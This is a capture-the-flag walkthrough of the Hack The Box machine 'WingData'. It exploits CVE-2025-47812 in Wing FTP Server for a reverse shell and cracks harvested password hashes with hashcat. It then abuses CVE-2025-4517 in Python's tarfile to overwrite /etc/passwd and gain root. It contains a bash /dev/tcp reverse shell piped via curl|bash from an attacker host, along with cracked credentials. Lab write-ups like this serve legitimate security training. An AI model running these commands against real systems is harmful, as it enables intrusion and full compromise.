Hack The Box / LINUX / 2026-06-27
Hack The Box — WingData (Linux)
CVE-2025-47812 in Wing FTP Server v7.4.3 allows to get a reverse shell as wingftp. Some user data are contained in XML files and we can crack the password of user wacky and login via SSH. User wacky can run a Python script with sudo privileges. The script uses the tar package and `tar.extractall()`. CVE-2025-4517 allows to modify existing files, so we can modify /etc/passwd to add a root user.
Target
- IP:
10.129.11.92
Port scan
sudo nmap -sC -sV 10.129.11.92 -p- -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 a1:fa:95:8b:d7:56:03:85:e4:45:c9:c7:1e:ba:28:3b (ECDSA)
|_ 256 9c:ba:21:1a:97:2f:3a:64:73:c1:4c:1d:ce:65:7a:2f (ED25519)
80/tcp open http Apache httpd 2.4.66
|_http-title: Did not follow redirect to http://wingdata.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.66 (Debian)
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Add wingdata.htb to /etc/hosts.
Initial enumeration
Go to http://wingdata.htb/.
There is a button labeled client portal.
It redirects to http://ftp.wingdata.htb/
Add ftp.wingdata.htb to /etc/hosts
Go to http://ftp.wingdata.htb/
It is Wing FTP Server v7.4.3.
CVE-2025-47812 - Wing FTP Server
There is a vulnerability: CVE-2025-47812.
Here is a PoC: https://www.exploit-db.com/exploits/52347
Download the PoC
python3 CVE-2025-47812.py -u http://ftp.wingdata.htb
[*] Testing target: http://ftp.wingdata.htb
[+] http://ftp.wingdata.htb is vulnerable!
python3 CVE-2025-47812.py -u http://ftp.wingdata.htb -c whoami
wingftp
Create a rev file with the following content:
bash -i >& /dev/tcp/10.10.17.53/4444 0>&1
Start the listeners:
python3 -m http.server 5555
nc -vlnp 4444
Trigger the reverse shell:
python3 CVE-2025-47812.py -u http://ftp.wingdata.htb -c 'curl http://10.10.17.53:5555/rev|bash'
We obtain a reverse shell.
Let's check the users of the machine:
ls -la /home
total 12
drwxr-xr-x 3 root root 4096 Nov 3 12:04 .
drwxr-xr-x 18 root root 4096 Feb 9 08:19 ..
drwxrwx--- 2 wacky wacky 4096 Jan 22 04:41 wacky
Harvesting credentials
grep -nriE 'wacky' .
./Data/1/users/wacky.xml:4: <UserName>wacky</UserName>
./Log/Admin/Admin-2025-11-2.log:15:[01] Sun, 02 Nov 2025 12:04:49 administrator 'admin' added a user 'wacky'. [1]
grep: ./Log/audit_db: binary file matches
In /opt/wftpserver/Data/1/users there are XML files containing user data. In wacky.xml we notice:
<Password>32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca</Password>
grep -nriE 'UserName|<Password>' .
./maria.xml:4: <UserName>maria</UserName>
./maria.xml:7: <Password>a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03</Password>
./steve.xml:4: <UserName>steve</UserName>
./steve.xml:7: <Password>5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca</Password>
./wacky.xml:4: <UserName>wacky</UserName>
./wacky.xml:7: <Password>32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca</Password>
./anonymous.xml:4: <UserName>anonymous</UserName>
./anonymous.xml:7: <Password>d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca</Password>
./john.xml:4: <UserName>john</UserName>
./john.xml:7: <Password>c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10</Password>
In /opt/wftpserver/Data/1/settings.xml we also notice:
./settings.xml:172: <SaltingString>WingFTP</SaltingString>
Add:
maria:a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03:WingFTP
steve:5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca:WingFTP
wacky:32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP
anonymous:d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca:WingFTP
john:c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10:WingFTP
In a hash file:
Cracking with hashcat and SSH access
./hashcat/hashcat -a 0 -m 1410 ./hash ./rockyou.txt --username
./hashcat/hashcat -a 0 -m 1410 ./hash ./rockyou.txt --username --show
wacky:32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP:!#7Blushing^*Bride5
anonymous:d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca:WingFTP:
ssh wacky@wingdata.htb
# Enter password !#7Blushing^*Bride5
Sudo permissions
sudo -l
Matching Defaults entries for wacky on wingdata:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User wacky may run the following commands on wingdata:
(root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *
sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py --help
usage: restore_backup_clients.py [-h] -b BACKUP -r RESTORE_DIR
Restore client configuration from a validated backup tarball.
options:
-h, --help show this help message and exit
-b BACKUP, --backup BACKUP
Backup filename (must be in /home/wacky/backup_clients/ and match backup_<client_id>.tar,
where <client_id> is a positive integer, e.g., backup_1001.tar)
-r RESTORE_DIR, --restore-dir RESTORE_DIR
Staging directory name for the restore operation. Must follow the format:
restore_<client_user> (e.g., restore_john). Only alphanumeric characters and underscores
are allowed in the <client_user> part (1–24 characters).
Example: sudo restore_backup_clients.py -b backup_1001.tar -r restore_john
The script takes a .tar backup and extracts it into a restore directory.
It validates both backup and restore-dir arguments, preventing simple attacks.
For backup and restore directories it uses:
BACKUP_BASE_DIR = "/opt/backup_clients/backups"
STAGING_BASE = "/opt/backup_clients/restored_backups"
We can write in the backup folder, but not in the restore folder.
The script uses the tar package and tar.extractall():
with tarfile.open(backup_path, "r") as tar:
tar.extractall(path=staging_dir, filter="data")
The data filter mitigates many path traversal, symlink, and unsafe file issues.
Checking Python version:
python3 --version
Python 3.12.3
Searching online we find a vulnerability in Python tar package: CVE-2025-4517.
CVE-2025-4517 - Python tar package
PoC: https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f
Using the PoC we can modify existing files. Since we run the script with sudo, we have root privileges.
The idea is to modify /etc/passwd to add a root user.
cd /opt/backup_clients/backups/
We copy /etc/passwd locally:
cp /etc/passwd .
We add a user r00t with password Password123:
pw=$(openssl passwd Password123); echo "r00t:${pw}:0:0:root:/root:/bin/bash" >> passwd
We modify the PoC script CVE-2025-4517.py to overwrite the original passwd file with ours. See the attached script CVE-2025-4517.py.
Copy it in /opt/backup_clients/backups/
Run it:
python3 CVE-2025-4517.py
We get poc.tar
Rename it:
mv poc.tar backup_1.tar
Run the vulnerable script:
sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py -b backup_1.tar -r restore_test
[+] Backup: backup_1.tar
[+] Staging directory: /opt/backup_clients/restored_backups/restore_test
[+] Extraction completed in /opt/backup_clients/restored_backups/restore_test
Check:
cat /etc/passwd
We see:
r00t:$1$o7C749dd$CefPQKA.696u48JenDJWa1:0:0:root:/root:/bin/bash
Login as root:
su r00t
# Enter password Password123
We obtain a root shell